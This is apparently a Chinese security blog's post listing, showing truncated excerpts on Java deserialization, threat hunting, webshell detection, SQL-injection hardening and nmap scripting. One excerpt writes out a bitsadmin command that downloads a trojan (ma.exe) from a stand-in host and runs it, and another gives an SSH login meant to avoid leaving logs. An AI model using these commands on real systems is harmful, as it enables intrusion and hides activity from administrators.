1
2
3
4
5
6
7
连击 天
fork: star:
加载中
原
反序列化漏洞研究
最近几周一直在研究java的反序列化漏洞相关问题 我们先来看看这个著名的类和其中的那个方法了 对没错 就是这个大名鼎鼎的readObject方法 一旦黑客发现了"可乘之机" 就会构造一个paylaods比如...
威胁狩猎简介<译文>
什么是威胁狩猎 威胁狩猎也被叫做威胁搜索、网络狩猎或者网络威胁搜索,他不同于apt攻击或者红蓝军渗透测试这类模拟攻击者攻寻找黑入IT设施漏洞的行为。 在威胁狩猎中,安全专家们会打破常规...
原
远程rce漏洞执行命令
# windows # 首先需要准备一个木马程序ma.exe bitsadmin /transfer myjob1/download /priority normal http://www.xxx.com/ma.exe c:\windows\temp\ma.exe c:\windows\temp\ma.exe # ma.exe保...
原
利用lamda函数 的函数式编程 实现scrapy审计外网安全问题
import scrapy from scrapy.spiders import Spider def parse_response(response, ip_in): title = response.xpath("/html/head/title").extract()[0] filename = 'quotes.txt' with open......
原
缓解java执行命令抵御反序列化漏洞的实现方案
最近st2 框架又出漏洞了 一大堆java被执行命令了 这里我提一个解决方案 可以适当缓解服务端被漏洞进行rce漏洞的问题 LD_PRELOAD替换进程底层函数 首先请看这篇文章 如果是某位c++的大佬 您老...
原
不会留下即时日志的ssh登录方法
ssh -T root@127.0.0.1 /bin/bash -i #-T 表示不分配伪终端 (正常的会话,在分配伪终端之后才会调用utmp和wtmp的日志接口) # /usr/bin/bash -i 表示在登录之后 调用bash命令 #不留下.bash...
原
改造mybatis抵御sql注入的研究和SDL的思考
这段时间看了百度的openrasp的源代码和相关资料 (地址:https://rasp.baidu.com) 在实施的过程中还是遇到了很多的阻力,所以开始自己调研相关的技术方案 我觉得能在研发阶段就能使程序员适应安...
原
调试spring boot的方法
首先在springboot的pom.xml中的插件中增加一个用于调试的插件 <build> <plugins> <plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-m......
原
编译mybatis 3.4.6 替换到springboot 2.0.2
编译mybatis需要先编译一个mybatis的parent项目(对应的spring boot 2.0.2的mybatis-spring-boot-starter的mybatis版本) 本文举例为mybatis 3.4.6(本文当前的springboot 依赖3.4.6 可以在ide...
原
php查inode时间戳查webshell
<?php function read_all($dir) { if (!is_dir($dir)) return false; $handle = opendir($dir); if ($handle) { while (($fl = readdir($handle)) !== false) { $temp = $......
原
利用openssl生成强密码命令
echo `openssl rand -base64 50 | tr -dc A-Z-a-z-0-9 | head -c${1:-32}` # 只会出现大小写和数字 长度控制在32位 # 第一个50代表足够的原始长度 第二个32代表长度为32......
原
nmap为了开发方便 可以做简单的修改
因为nmap扫描是默认使用的是nse脚本,但是在开发的过程中需要修改后缀(主要是因为后缀为lua才能显示高亮,所以这里用一个取巧的办法) nse_main.lua文件中我们找到如下代码 local t, path = cn...
原
python3写unicode编码到文件
import sys #读取源文件内容支持中文 用的utf-8 f=open('be.txt','r',encoding='utf-8') data=f.read() f.close() # 打印宽字节编码 print(data.encode('unicode_escape')) # 写入...
原
centos6/7通用查看系统版本
cat /etc/redhat-release # 或者 cat /etc/centos-release 不管是 6 还是 7 都能看到 发行的版本信息
原
ruby centos 快速安装
Ruby 安装方法——RVM 操作系统: CentOS 7.4 说明:在CentOS上,直接用 yum 安装 Ruby的话,安装的版本比较低,所以,就直接用 RVM 进行安装。 步骤1: 安装依赖包 yum install gcc-c++ patc...
原
linux下获取本机的获取内网和外网地址
1.获取内网地址(私有地址) ifconfig -a 2.获取外网地址(公网地址) curl members.3322.org/dyndns/getip
原
一个很棒的lua函数 用来打印table的内容
function print_r ( t ) local print_r_cache={} local function sub_print_r(t,indent) if (print_r_cache[tostring(t)]) then print(indent.."*"..tostring...
原
nmap实现 自动发现web漏洞的思路
local http = require "http" local shortport = require "shortport" local stdnse = require "stdnse" local string = require "string" -- 作者 author = "k4n5ha0" -- 授权 lic...
没有更多内容
加载失败,请刷新页面
删除文章
文章删除后无法恢复,确定取消删除此文章吗?
删除动弹
动弹删除后,数据将无法恢复
评论删除后,数据将无法恢复